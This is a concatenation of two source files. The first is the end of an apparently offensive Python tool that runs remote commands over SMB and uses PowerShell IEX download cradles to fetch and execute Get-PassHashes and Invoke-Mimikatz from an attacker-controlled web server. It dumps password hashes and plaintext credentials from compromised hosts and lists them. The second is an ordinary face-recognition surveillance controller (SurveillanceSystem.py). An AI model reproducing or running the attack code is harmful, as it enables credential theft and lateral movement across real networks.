command='C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe '+powershellArgs+' -Command "$ping = new-object system.net.networkinformation.ping; $ping.send(\''+z+'\') | Select-Object -ExpandProperty Status"'
if verbose==True:
print command
executer = smbexec2.CMDEXEC(tmpusername, tmppassword, tmpdomain, hashes, aesKey, k, dc_ip, mode, share, relayPortNo, command)
executer.run(targetIP,targetIP)
results=executer.getOutput()
if verbose==True:
print results
if "Success" in str(results):
tmpSelectedIP=z
print (setColor("[+]", bold, color="green"))+" IP address "+tmpSelectedIP+" reachable by "+ip
else:
tmpSelectedIP=tmpIPList[0]
if len(tmpSelectedIP)<1:
print "Unable to find a route from "+ip+" to "+targetIP
else:
complete=False
print (setColor("[+]", bold, color="green"))+" Dumping password hashes from "+ip+" via "+targetIP+":"+str(relayPortNo)
#command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass \"IEX (New-Object Net.WebClient).DownloadString('http://"+tmpSelectedIP+":8000/download?filepath=C:\windows\\temp\Get-PassHashes.ps1'); Get-PassHashes\""
command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" \"IEX (New-Object Net.WebClient).DownloadString('http://"+tmpSelectedIP+":8000/download?filepath=C:\windows\\temp\\"+tmpFilename1+"'); Get-PassHashes\""
if verbose==True:
print command
while complete==False:
executer = smbexec2.CMDEXEC(tmpusername, tmppassword, tmpdomain, hashes, aesKey, k, dc_ip, mode, share, relayPortNo, command)
executer.run(targetIP,targetIP)
results=executer.getOutput()
results=results.replace("\r","")
results=results.replace("\n","")
if len(results)>2:
complete=True
else:
print "Sleeping for 3 seconds"
time.sleep(3)
tmpResultList=results.split(":::")
if len(tmpResultList)>0:
print "\n"
for z in tmpResultList:
z=z.strip()
if len(z)>0:
print z+":::"
print "\n"
if ip not in compromisedHostList:
compromisedHostList.append(ip)
print (setColor("[+]", bold, color="green"))+" Running Mimikatz against "+ip+" via "+targetIP+":"+str(relayPortNo)
#command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass \"IEX (New-Object Net.WebClient).DownloadString('http://"+tmpSelectedIP+":8000/download?filepath=C:\windows\\temp\Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds\""
command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" \"IEX (New-Object Net.WebClient).DownloadString('http://"+tmpSelectedIP+":8000/download?filepath=C:\windows\\temp\\"+tmpFilename2+"');Invoke-Mimikatz -DumpCreds\""
if verbose==True:
print command
complete=False
while complete==False:
executer = smbexec2.CMDEXEC(tmpusername, tmppassword, tmpdomain, hashes, aesKey, k, dc_ip, mode, share, relayPortNo, command)
executer.run(targetIP,targetIP)
results=executer.getOutput()
if len(str(results))>100:
tmpList=parseMimikatzOutput(results)
for x in tmpList:
tmpDomain=x[0]
tmpUsername=x[1]
tmpPassword=x[2]
print "\nIP: "+ip+" ("+targetIP+":"+str(relayPortNo)+")"
print "Domain: "+x[0]
print "Username: "+x[1]
print "Password: "+x[2]
complete=True
if ip not in compromisedHostList:
compromisedHostList.append(ip)
else:
print "Sleeping for 3 seconds"
time.sleep(3)
print "\n"+(setColor("[+]", bold, color="green"))+" Clearing temp files on "+targetIP
#command='cmd /c del C:\\windows\\temp /F /Q'
#results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
#print results
#executer = smbexec.CMDEXEC(tmpusername, tmppassword, tmpdomain, hashes, aesKey, k, dc_ip, mode, share, relayPortNo, command)
#executer.run(targetIP,targetIP)
#if ip in str(results) and results!=None:
# print (setColor("[+]", bold, color="green"))+" Testing credentials against "+ip+(setColor(" [OK]", bold, color="green"))+" ("+tmpdomain+"\\"+tmpusername+"|"+tmppassword+")"
finalComplete=True
else:
print (setColor("[-]", bold, color="red"))+" Testing credentials against "+ip+(setColor(" [FAIL]", bold, color="red"))+" ("+tmpdomain+"\\"+tmpusername+"|"+tmppassword+")"
#if "nt authority\system" not in str(results) and results!=None:
# print (setColor("[+]", bold, color="green"))+" Testing credentials against "+ip+" [NOT OK] ("+tmpdomain+"\\"+tmpusername+"|"+tmppassword+")"
# os._exit(1)
finalComplete=True
os.remove(web_dir+"/"+tmpFilename1)
os.remove(web_dir+"/"+tmpFilename2)
os.remove(web_dir+"/"+tmpFilename3)
os.remove(web_dir+"/"+tmpFilename4)
os.remove(web_dir+"/"+tmpFilename5)
os.remove(web_dir+"/"+tmpFilename6)
print "exit0"
sys.exit()
print "exit1"
os._exit(1)
except (Exception, KeyboardInterrupt), e:
logging.critical(str(e))
os._exit(1)
|
SurveillanceSystem.py
|
# Surveillance System Controller.
# Brandon Joffe
# 2016
# Copyright 2016, Brandon Joffe, All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Code used in this project included opensource software (Openface)
# developed by Brandon Amos
# Copyright 2015-2016 Carnegie Mellon University
import time
import argparse
import cv2
import os
import numpy as np
import dlib
from subprocess import Popen, PIPE
import os.path
import sys
import logging
from logging.handlers import RotatingFileHandler
import threading
import time
from datetime import datetime, timedelta
#import smtplib
#from email.mime.multipart import MIMEMultipart
#from email.mime.text import MIMEText
#from email.mime.base import MIMEBase
#from email import encoders
import requests
import json
import Camera
import FaceRecogniser
import ImageUtils
import random
#
from websocket import create_connection
import apprise
# Get paths for models
# //////////////////////////////////////////////////////////////////////////////////////////////
fileDir = os.path.dirname(os.path.realpath(__file__))
luaDir = os.path.join(fileDir, '..', 'batch-represent')
modelDir = os.path.join(fileDir, '..', 'models')
dlibModelDir = os.path.join(modelDir, 'dlib')
openfaceModelDir = os.path.join(modelDir, 'openface')
parser = argparse.ArgumentParser()
parser.add_argument('--dlibFacePredictor',
type=str, help="Path to dlib's face predictor.",
default=os.path.join(dlibModelDir , "shape_predictor_68_face_landmarks.dat"))
parser.add_argument('--networkModel',
type=str, help="Path to Torch network model.",
default=os.path.join(openfaceModelDir, 'nn4.small2.v1.t7'))
parser.add_argument('--imgDim', type=int, help="Default image dimension.", default=96)
parser.add_argument('--cuda', action='store_true')
parser.add_argument('--unknown', type=bool, default=False, help='Try to predict unknown people')
args = parser.parse_args()
args.cuda = True
start = time.time()
np.set_printoptions(precision=2)
if args.cuda and dlib.cuda.get_num_devices()>0:
print("Surveillance System Controller DLIB using CUDA")
dlib.DLIB_USE_CUDA = True
try:
os.makedirs('logs', exist_ok=True) # Python>3.2
except TypeError:
try:
os.makedirs('logs')
except OSError as exc: # Python >2.5
print("logging directory already exist")
logger = logging.getLogger()
formatter = logging.Formatter("(%(threadName)-10s) %(asctime)s - %(name)s - %(levelname)s - %(message)s")
handler = RotatingFileHandler("logs/surveillance.log", maxBytes=10000000, backupCount=10)
handler.setLevel(logging.INFO)
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.INFO)
#logging.basicConfig(level=logging.DEBUG,
# format='(%(threadName)-10s) %(message)s',
# )
class SurveillanceSystem(object):
""" The SurveillanceSystem object is the heart of this application.
It provides all the central proccessing and ties everything
together. It generates camera frame proccessing threads as
well as an alert monitoring thread. A camera frame proccessing
thread can process a camera using 5 different processing methods.
These methods aim to allow the user to adapt the system to their
needs and can be found in the process_frame() function. The alert
monitoring thread continually checks the system state and takes
action if a particular event occurs. """
def __init__(self):
self.recogniser = FaceRecogniser.FaceRecogniser()
self.trainingEvent = threading.Event() # Used to holt processing while training the classifier
self.trainingEvent.set()
self.drawing = True
self.alarmState = 'Disarmed' # Alarm states - Disarmed, Armed, Triggered
self.alarmTriggerd = False
self.alerts = [] # Holds all system alerts
self.cameras = [] # Holds all system cameras
self.camerasLock = threading.Lock() # Used to block concurrent access of cameras []
self.cameraProcessingThreads = []
self.peopleDB = []
self.confidenceThreshold = 50 # Used as a threshold to classify a person as unknown
# Initialization of alert processing thread
self.alertsLock = threading.Lock()
self.alertThread = threading.Thread(name='alerts_process_thread_',target=self.alert_engine,args=())
self.alertThread.daemon = False
self.alertThread.start()
# Used for testing purposes
###################################
self.testingResultsLock = threading.Lock()
self.detetectionsCount = 0
self.trueDetections = 0
self.counter = 0
####################################
self.get_face_database_names() # Gets people in database for web client
self.apobj = None
self._read_config()
#//////////////////////////////////////////////////// Camera Examples ////////////////////////////////////////////////////
#self.cameras.append(Camera.IPCamera("testing/iphoneVideos/singleTest.m4v","detect_recognise_track",False)) # Video Example - uncomment and run code
# self.cameras.append(Camera.IPCamera("http://192.168.1.33/video.mjpg","detect_recognise_track",False))
# processing frame threads
for i, cam in enumerate(self.cameras):
thread = threading.Thread(name='frame_process_thread_' + str(i),target=self.process_frame,args=(cam,))
thread.daemon = False
self.cameraProcessingThreads.append(thread)
thread.start()
def _read_config(self):
if not os.path.isfile('config.json'):
return
with open('config.json') as json_file:
config = json.load(json_file)
for cam in config["cameras"]:
print("cam", cam)
dlibDetection = False
if cam["dlibDetection"].lower() == "true":
dlibDetection = True
fpsTweak = False
if cam["fpsTweak"].lower() == "true":
fpsTweak = True
self.cameras.append(Camera.IPCamera(cam["url"], cam["cameraFunction"], dlibDetection, fpsTweak))
for al in config["alerts"]:
print("alert", al)
self.alerts.append(Alert(al["alarmState"],
al["camera"],
al["event"],
al["person"],
al["actions"],
al["emailAddress"],
int(al["confidence"])))
def write_config(self):
config = {}
config["cameras"] = []
config["alerts"] = []
# Camera: url, cameraFunction, dlibDetection, fpsTweak
for cam in self.cameras:
config["cameras"].append({"url": cam.url,
"cameraFunction": cam.cameraFunction,
"dlibDetection": cam.dlibDetection,
"fpsTweak": cam.fpsTweak})
# Alert: alarmState, camera, event, person, actions, emailAddress, confidence
for al in self.alerts:
config["alerts"].append({"alarmState": al.alarmState,
"camera": al.camera,
"event": al.event,
"person": al.person,
"actions": al.actions,
"emailAddress": al.emailAddress,
"confidence": al.confidence})
with open('config.json', 'w') as outfile:
json.dump(config, outfile)
def add_camera(self, camera):
"""Adds new camera to the System and generates a
frame processing thread"""
print("add_camerea - {}".format(camera))
self.cameras.append(camera)
thread = threading.Thread(name='frame_process_thread_' +
str(len(self.cameras)),
target=self.process_frame,
args=(self.cameras[-1],))
thread.daemon = False
self.cameraProcessingThreads.append(thread)
thread.start()
def remove_camera(self, camID):
"""remove a camera to the System and kill its processing thread"""
print("remove_camera - camID {}".format(camID))
if "_" in camID:
cid = camID.split("_")[1]
else:
cid = camID
cam = self.cameras[int(cid)]
cam.captureThread.stop = False
self.cameras.pop(int(cid))
self.cameraProcessingThreads.pop(int(cid))
#self.captureThread.stop = False
def process_frame(self,camera):
"""This function performs all the frame proccessing.
It reads frames captured by the IPCamera instance,
resizes them, and performs 1 of 5 functions"""
logger.debug('Processing Frames')
state = 1
frame_count = 0;
FPScount = 0 # Used to calculate frame rate at which frames are being processed
FPSstart = time.time()
start = time.time()
stop = camera.captureThread.stop
while not stop:
frame_count +=1
logger.debug("Reading Frame")
frame = camera.read_frame()
# Checks to see if the new frame is the same as the previous frame
if (frame is None) or np.array_equal(frame, camera.tempFrame):
continue
frame = ImageUtils.resize(frame)
height, width, channels = frame.shape
grayFrame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # frame in gray scale
# Frame rate calculation
if FPScount == 6:
camera.processingFPS = 6/(time.time() - FPSstart)
FPSstart = time.time()
FPScount = 0
FPScount += 1
camera.tempFrame = frame
####################
# MOTION DETECTION #
####################
if camera.cameraFunction == "detect_motion":
camera.motion, mframe = camera.motionDetector.detect_movement(grayFrame, get_rects = False, grayFrame=True)
camera.processing_frame = frame #mframe
if camera.motion == False:
logger.debug('//// NO MOTION DETECTED /////')
continue
else:
logger.debug('/// MOTION DETECTED ///')
#print("- MOTION DETECTED -")
##################################
# FACE DETECTION AND RECOGNTIION #
##################################
elif camera.cameraFunction == "detect_recognise":
# This approach performs basic face detection and
# recognition using OpenCV, Dlib and Openface
training_blocker = self.trainingEvent.wait()
#rgbFrame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
camera.faceBoxes = camera.faceDetector.detect_faces(frame, camera.dlibDetection)
if self.drawing == True:
frame = ImageUtils.draw_boxes(frame, camera.faceBoxes, camera.dlibDetection)
#frame = ImageUtils.draw_boxes(frame, camera.faceBoxes, True) # OpenCV DNN returns dlib.rectangle
camera.processing_frame = frame
if len(camera.faceBoxes) > 0:
print('//// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' //')
logger.info('//// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' //')
for face_bb in camera.faceBoxes:
# Used to reduce false positives from opencv haar cascade detector.
# If face isn't detected using more rigorous paramters in the detectMultiscale()
# function read the next frame
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(int(x), int(y), int(x+w), int(y+h))
faceimg = ImageUtils.crop(frame, face_bb, dlibRect = camera.dlibDetection)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
# returns a dictionary that contains name, confidence and representation and an alignedFace (numpy array)
predictions, alignedFace = self.recogniser.make_prediction(frame, face_bb)
with camera.peopleDictLock:
# If the person has already been detected and his new confidence is greater
# update persons details, otherwise create a new person
if predictions['name'] in camera.people:
if camera.people[predictions['name']].confidence < predictions['confidence']:
camera.people[predictions['name']].confidence = predictions['confidence']
if camera.people[predictions['name']].confidence > self.confidenceThreshold:
camera.people[predictions['name']].identity = predictions['name']
camera.people[predictions['name']].set_thumbnail(alignedFace)
camera.people[predictions['name']].add_to_thumbnails(alignedFace)
camera.people[predictions['name']].set_time()
else:
if predictions['confidence'] > self.confidenceThreshold:
camera.people[predictions['name']] = Person(predictions['rep'], predictions['confidence'], alignedFace, predictions['name'])
else:
camera.people[predictions['name']] = Person(predictions['rep'], predictions['confidence'], alignedFace, "unknown")
# Used for streaming proccesed frames to client and email alerts, but mainly used for testing purposes
camera.processing_frame = frame
#####################################################################
# MOTION DETECTION EVENT FOLLOWED BY FACE DETECTION AND RECOGNITION #
#####################################################################
elif camera.cameraFunction == "motion_detect_recognise":
# When motion is detected, consecutive frames are proccessed for faces.
# If no faces are detected for longer than 30 seconds the thread goes back to
# looking for motion
training_blocker = self.trainingEvent.wait()
if state == 1: # If no faces have been found or there has been no movement
camera.motion, mframe = camera.motionDetector.detect_movement(frame, get_rects = False)
if camera.motion == True:
logger.debug('////////////////////// MOTION DETECTED //////////////////////')
state = 2
camera.processing_frame = mframe
else:
logger.debug('////////////////////// NO MOTION DETECTED //////////////////////')
continue
elif state == 2: # If motion has been detected
if frame_count == 0:
start = time.time()
frame_count += 1
#frame = cv2.flip(frame, 1)
camera.faceBoxes = camera.faceDetector.detect_faces(frame,camera.dlibDetection)
if self.drawing == True:
frame = ImageUtils.draw_boxes(frame, camera.faceBoxes, camera.dlibDetection)
camera.processing_frame = frame
if len(camera.faceBoxes) == 0:
if (time.time() - start) > 30.0:
logger.info('// No faces found for ' + str(time.time() - start) + ' seconds - Going back to Motion Detection Mode')
state = 1
frame_count = 0;
else:
logger.info('//// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' ////')
# frame = cv2.flip(frame, 1)
for face_bb in camera.faceBoxes:
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(int(x), int(y), int(x+w), int(y+h))
faceimg = ImageUtils.crop(frame, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
predictions, alignedFace = self.recogniser.make_prediction(frame,face_bb)
with camera.peopleDictLock:
if predictions['name'] in camera.people:
if camera.people[predictions['name']].confidence < predictions['confidence']:
camera.people[predictions['name']].confidence = predictions['confidence']
if camera.people[predictions['name']].confidence > self.confidenceThreshold:
camera.people[predictions['name']].identity = predictions['name']
camera.people[predictions['name']].set_thumbnail(alignedFace)
camera.people[predictions['name']].add_to_thumbnails(alignedFace)
camera.people[predictions['name']].set_time()
else:
if predictions['confidence'] > self.confidenceThreshold:
camera.people[predictions['name']] = Person(predictions['rep'],
predictions['confidence'],
alignedFace, predictions['name'])
else:
camera.people[predictions['name']] = Person(predictions['rep'],
predictions['confidence'],
alignedFace, "unknown")
start = time.time() # Used to go back to motion detection state of 30s of not finding a face
camera.processing_frame = frame
##################################################################################
# MOTION DETECTION OBJECT SEGMENTAION FOLLOWED BY FACE DETECTION AND RECOGNITION #
##################################################################################
elif camera.cameraFunction == "segment_detect_recognise":
# This approach uses background subtraction to segement a region of
# interest that is likely to contain a person. The region is cropped from
# the frame and face detection is performed on a much smaller image. This
# improves proccessing performance but is highly dependent upon the accuracy of
# the background model generated by the MotionDetector object.
training_blocker = self.trainingEvent.wait()
camera.motion, peopleRects = camera.motionDetector.detect_movement(frame, get_rects = True)
if camera.motion == False:
camera.processing_frame = frame
logger.debug('////-- NO MOTION DETECTED --////')
continue
logger.debug('///// MOTION DETECTED /////')
if self.drawing == True:
frame = ImageUtils.draw_boxes(frame, peopleRects, False)
for x, y, w, h in peopleRects:
logger.debug('//// Proccessing People Segmented Areas ///')
bb = dlib.rectangle(int(x), int(y), int(x+w), int(y+h))
personimg = ImageUtils.crop(frame, bb, dlibRect = True)
personimg = cv2.flip(personimg, 1)
camera.faceBoxes = camera.faceDetector.detect_faces(personimg,camera.dlibDetection)
if self.drawing == True:
camera.processing_frame = ImageUtils.draw_boxes(frame, peopleRects, False)
for face_bb in camera.faceBoxes:
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(int(x), int(y), int(x+w), int(y+h))
faceimg = ImageUtils.crop(personimg, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
logger.info('/// Proccessing Detected faces ///')
predictions, alignedFace = self.recogniser.make_prediction(personimg,face_bb)
with camera.peopleDictLock:
if predictions['name'] in camera.people:
if camera.people[predictions['name']].confidence < predictions['confidence']:
camera.people[predictions['name']].confidence = predictions['confidence']
camera.people[predictions['name']].set_thumbnail(alignedFace)
camera.people[predictions['name']].add_to_thumbnails(alignedFace)
camera.people[predictions['name']].set_time()
else:
if predictions['confidence'] > self.confidenceThreshold:
camera.people[predictions['name']] = Person(predictions['rep'],
predictions['confidence'],
alignedFace,
predictions['name'])
else:
camera.people[predictions['name']] = Person(predictions['rep'],
predictions['confidence'],
alignedFace, "unknown")
#############################################################################################
# MOTION DETECTION OBJECT SEGMENTAION FOLLOWED BY FACE DETECTION, RECOGNITION AND TRACKING #
#############################################################################################
elif camera.cameraFunction == "detect_recognise_track":
# This approach incorporates background subtraction to perform person tracking
# and is the most efficient out of the all proccesing funcions above. When
# a face is detected in a region a Tracker object it generated, and is updated
# every frame by comparing the last known region of the person, to new regions
# produced by the motionDetector object. Every update of the tracker a detected
# face is compared to the person's face of whom is being tracked to ensure the tracker
# is still tracking the correct person. This is acheived by comparing the prediction
# and the the l2 distance between their embeddings (128 measurements that represent the face).
# If a tracker does not overlap with any of the regions produced by the motionDetector object
# for some time the Tracker is deleted.
training_blocker = self.trainingEvent.wait() # Wait if classifier is being trained
logger.debug('//// detect_recognise_track 1 ////')
peopleFound = False
camera.motion, peopleRects = camera.motionDetector.detect_movement(grayFrame, get_rects = True, grayFrame=True)
logger.debug('//// detect_recognise_track 2 /////')
if camera.motion == False:
camera.processing_frame = frame
logger.debug('///// NO MOTION DETECTED /////')
continue
if self.drawing == True:
camera.processing_frame = ImageUtils.draw_boxes(frame, peopleRects, False)
logger.debug('//// MOTION DETECTED //////')
for x, y, w, h in peopleRects:
peopleFound = True
#person_bb = dlib.rectangle(int(x), int(y), int(x+w), int(y+h))
personimg = ImageUtils.crop(frame, person_bb) # Crop regions of interest
#personimg = cv2.flip(personimg, 1)
tracked = False
# Iterate through each tracker and compare there current psotiion
for i in range(len(camera.trackers) - 1, -1, -1):
if camera.trackers[i].overlap(person_bb):
logger.debug("=> Updating Tracker <=")
camera.trackers[i].update_tracker(person_bb)
# personimg = cv2.flip(personimg, 1)
camera.faceBoxes = camera.faceDetector.detect_faces(personimg, camera.dlibDetection)
logger.debug('////// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' /////')
if len(camera.faceBoxes) > 0:
logger.info("Found " + str(len(camera.faceBoxes)) + " faces.")
for face_bb in camera.faceBoxes:
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(int(x), int(y), int(x+w), int(y+h))
faceimg = ImageUtils.crop(personimg, face_bb)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
predictions, alignedFace = self.recogniser.make_prediction(personimg, face_bb)
if predictions['confidence'] > self.confidenceThreshold:
predictedName = predictions['name']
else:
predictedName = "unknown"
# If only one face is detected
if len(camera.faceBoxes) == 1:
# if not the same person check to see if tracked person is unknown
# and update or change tracker accordingly
# l2Distance is between 0-4
# Openface found that 0.99 was the average cutoff between the same and different faces
# the same face having a distance less than 0.99
if self.recogniser.getSquaredl2Distance(camera.trackers[i].person.rep,
predictions['rep']) > 0.99 and \
(camera.trackers[i].person.identity != predictedName):
alreadyBeenDetected = False
with camera.peopleDictLock:
for ID, person in camera.people.items():
# iterate through all detected people in camera
# if the person has already been detected continue to track that person
# - use same person ID
if person.identity == predictedName or \
self.recogniser.getSquaredl2Distance(person.rep, predictions['rep']) < 0.8:
person = Person(predictions['rep'],
predictions['confidence'],
alignedFace,
predictedName)
logger.info( "====> New Tracker for " +person.identity + " <===")
# Remove current tracker and create new one with the ID of the original person
del camera.trackers[i]
camera.trackers.append(Tracker(frame, person_bb, person,ID))
alreadyBeenDetected = True
break
if not alreadyBeenDetected:
num = random.randrange(1, 1000, 1)
# Create a new person ID
strID = "person" + datetime.now().strftime("%Y%m%d%H%M%S") + str(num)
# Is the new person detected with a low confidence? If yes, classify them as unknown
if predictions['confidence'] > self.confidenceThreshold:
person = Person(predictions['rep'],
predictions['confidence'],
alignedFace,
predictions['name'])
else:
person = Person(predictions['rep'],
predictions['confidence'],
alignedFace,
"unknown")
#add person to detected people
with camera.peopleDictLock:
camera.people[strID] = person
logger.info( "=====> New Tracker for new person <====")
del camera.trackers[i]
camera.trackers.append(Tracker(frame, person_bb, person,strID))
# if it is the same person update confidence
# if it is higher and change prediction from unknown to identified person
# if the new detected face has a lower confidence and can be classified as unknown,
# when the person being tracked isn't unknown - change tracker
else:
logger.info( "====> update person name and confidence <==")
if camera.trackers[i].person.confidence < predictions['confidence']:
camera.trackers[i].person.confidence = predictions['confidence']
if camera.trackers[i].person.confidence > self.confidenceThreshold:
camera.trackers[i].person.identity = predictions['name']
# If more than one face is detected in the region compare faces to the people being tracked
# and update tracker accordingly
else:
logger.info( "==> More Than One Face Detected <==")
# if tracker is already tracking the identified face make an update
if self.recogniser.getSquaredl2Distance(camera.trackers[i].person.rep,
predictions['rep']) < 0.99 and \
camera.trackers[i].person.identity == predictions['name']:
if camera.trackers[i].person.confidence < predictions['confidence']:
camera.trackers[i].person.confidence = predictions['confidence']
if camera.trackers[i].person.confidence > self.confidenceThreshold:
camera.trackers[i].person.identity = predictions['name']
else:
# if tracker isn't tracking this face check the next tracker
break
camera.trackers[i].person.set_thumbnail(alignedFace)
camera.trackers[i].person.add_to_thumbnails(alignedFace)
camera.trackers[i].person.set_rep(predictions['rep'])
camera.trackers[i].person.set_time()
camera.trackers[i].reset_face_pinger()
with camera.peopleDictLock:
camera.people[camera.trackers[i].id] = camera.trackers[i].person
camera.trackers[i].reset_pinger()
tracked = True
break
# If the region is not being tracked
if not tracked:
# Look for faces in the cropped image of the region
camera.faceBoxes = camera.faceDetector.detect_faces(personimg,camera.dlibDetection)
for face_bb in camera.faceBoxes:
if camera.dlibDetection == False:
if not isinstance(face_bb, dlib.rectangle):
x, y, w, h = face_bb
face_bb = dlib.rectangle(int(x), int(y), int(x+w), int(y+h))
faceimg = ImageUtils.crop(personimg, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
predictions, alignedFace = self.recogniser.make_prediction(personimg,face_bb)
alreadyBeenDetected = False
with camera.peopleDictLock:
# iterate through all detected people in camera, to see if the person has already been detected
for ID, person in camera.people.items():
if person.identity == predictions['name'] or \
self.recogniser.getSquaredl2Distance(person.rep ,predictions['rep']) < 0.8:
if predictions['confidence'] > self.confidenceThreshold and \
person.confidence > self.confidenceThreshold:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, predictions['name'])
else:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, "unknown")
logger.info( "==> New Tracker for " + person.identity + " <====")
camera.trackers.append(Tracker(frame, person_bb, person,ID))
alreadyBeenDetected = True
break
if not alreadyBeenDetected:
num = random.randrange(1, 1000, 1) # Create new person ID if they have not been detected
strID = "person" + datetime.now().strftime("%Y%m%d%H%M%S") + str(num)
if predictions['confidence'] > self.confidenceThreshold:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, predictions['name'])
else:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, "unknown")
#add person to detected people
with camera.peopleDictLock:
camera.people[strID] = person
logger.info( "====> New Tracker for new person <=")
camera.trackers.append(Tracker(frame, person_bb, person,strID))
for i in range(len(camera.trackers) - 1, -1, -1): # starts with the most recently initiated tracker
if self.drawing == True:
bl = (camera.trackers[i].bb.left(), camera.trackers[i].bb.bottom()) # (x, y)
tr = (camera.trackers[i].bb.right(), camera.trackers[i].bb.top()) # (x+w,y+h)
cv2.rectangle(frame, bl, tr, color=(0, 255, 255), thickness=2)
text = camera.trackers[i].person.identity + " " + str(camera.trackers[i].person.confidence)+ "%"
#print("text", text)
org = (camera.trackers[i].bb.left(), camera.trackers[i].bb.top() - 10)
#print("org", org)
cv2.putText(frame, text, org, cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.3, color=(0, 255, 255), thickness=1)
camera.processing_frame = frame
# Used to check if tracker hasn't been updated
camera.trackers[i].ping()
camera.trackers[i].faceping()
# If the tracker hasn't been updated for more than 10 pings delete it
if camera.trackers[i].pings > 10:
del camera.trackers[i]
continue
def alert_engine(self):
"""check alarm state -> check camera -> check event ->
either look for motion or look for detected faces -> take action"""
logger.debug('Alert engine starting')
while True:
with self.alertsLock:
for alert in self.alerts:
logger.debug('checking alert')
if alert.action_taken == False: # If action hasn't been taken for event
if alert.alarmState != 'All': # Check states
if alert.alarmState == self.alarmState:
logger.debug('checking alarm state')
alert.event_occurred = self.check_camera_events(alert)
else:
continue # Alarm not in correct state check next alert
else:
alert.event_occurred = self.check_camera_events(alert)
else:
if (time.time() - alert.eventTime) > 300: # Reinitialize event 5 min after event accured
logger.info( "reinitiallising alert: " + alert.id)
alert.reinitialise()
continue
time.sleep(2) # Put this thread to sleep - let websocket update alerts if need be (i.e delete or add)
def check_camera_events(self,alert):
"""Used to check state of cameras
to determine whether an event has occurred"""
if alert.camera != 'All': # Check cameras
logger.info( "alertTest" + alert.camera)
if alert.event == 'Recognition': #Check events
logger.info( "checkingalertconf "+ str(alert.confidence) + " : " + alert.person)
for person in self.cameras[int(alert.camera)].people.values():
logger.info( "checkingalertconf "+ str(alert.confidence )+ " : " + alert.person + " : " + person.identity)
if alert.person == person.identity: # Has person been detected
if alert.person == "unknown" and (100 - person.confidence) >= alert.confidence:
logger.info( "alertTest2" + alert.camera)
cv2.imwrite("notification/image.png", self.cameras[int(alert.camera)].processing_frame)#
self.take_action(alert)
return True
elif person.confidence >= alert.confidence:
logger.info( "alertTest3" + alert.camera)
cv2.imwrite("notification/image.png", self.cameras[int(alert.camera)].processing_frame)#
self.take_action(alert)
return True
return False # Person has not been detected check next alert
else:
logger.info( "alertTest4" + alert.camera)
if self.cameras[int(alert.camera)].motion == True: # Has motion been detected
logger.info( "alertTest5" + alert.camera)
cv2.imwrite("notification/image.png", self.cameras[int(alert.camera)].processing_frame)#
self.take_action(alert)
return True
else:
return False # Motion was not detected check next alert
else:
if alert.event == 'Recognition': # Check events
with self.camerasLock :
cameras = self.cameras
for camera in cameras: # Look through all cameras
for person in camera.people.values():
if alert.person == person.identity: # Has person been detected
if alert.person == "unknown" and (100 - person.confidence) >= alert.confidence:
cv2.imwrite("notification/image.png", camera.processing_frame)#
self.take_action(alert)
return True
elif person.confidence >= alert.confidence:
cv2.imwrite("notification/image.png", camera.processing_frame)#
self.take_action(alert)
return True
return False # Person has not been detected check next alert
else:
with self.camerasLock :
for camera in self.cameras: # Look through all cameras
if camera.motion == True: # Has motion been detected
cv2.imwrite("notification/image.png", camera.processing_frame)#
self.take_action(alert)
return True
return False # Motion was not detected check next camera
def take_action(self,alert):
"""Sends email alert and/or triggers the alarm"""
logger.info( "Taking action: ==" + json.dumps(alert.actions))
if alert.action_taken == False: # Only take action if alert hasn't accured - Alerts reinitialise every 5 min for now
alert.eventTime = time.time()
if alert.actions['mycroft_message'] == 'true':
logger.info( "mycroft notification being sent")
self.send_mycroft_notification_alert(alert)
if alert.actions['apprise_message'] == 'true':
logger.info( "apprise notification being sent")
self.send_apprise_notification_alert(alert)
alert.action_taken = True
def send_apprise_notification_alert(self,alert):
# send a push message with Apprise - see https://github.com/caronc/apprise
print(">>>Apprise<<<", alert.alertString)
if not self.apobj:
self.apobj = apprise.Apprise()
service = "" # set an Apprise url here, e.g. Pusbullet "pbul://xyz"
if service:
self.apobj.add(service)
print("alert.camera", alert.camera)
attachment = apprise.AppriseAttachment()
if alert.camera.endswith("All"):
camNum = 0
for c in self.cameras:
attachment.add('http://127.0.0.1:5000/camera_snapshot/{}'.format(camNum))
camNum += 1
else:
camNum = alert.camera[-1]
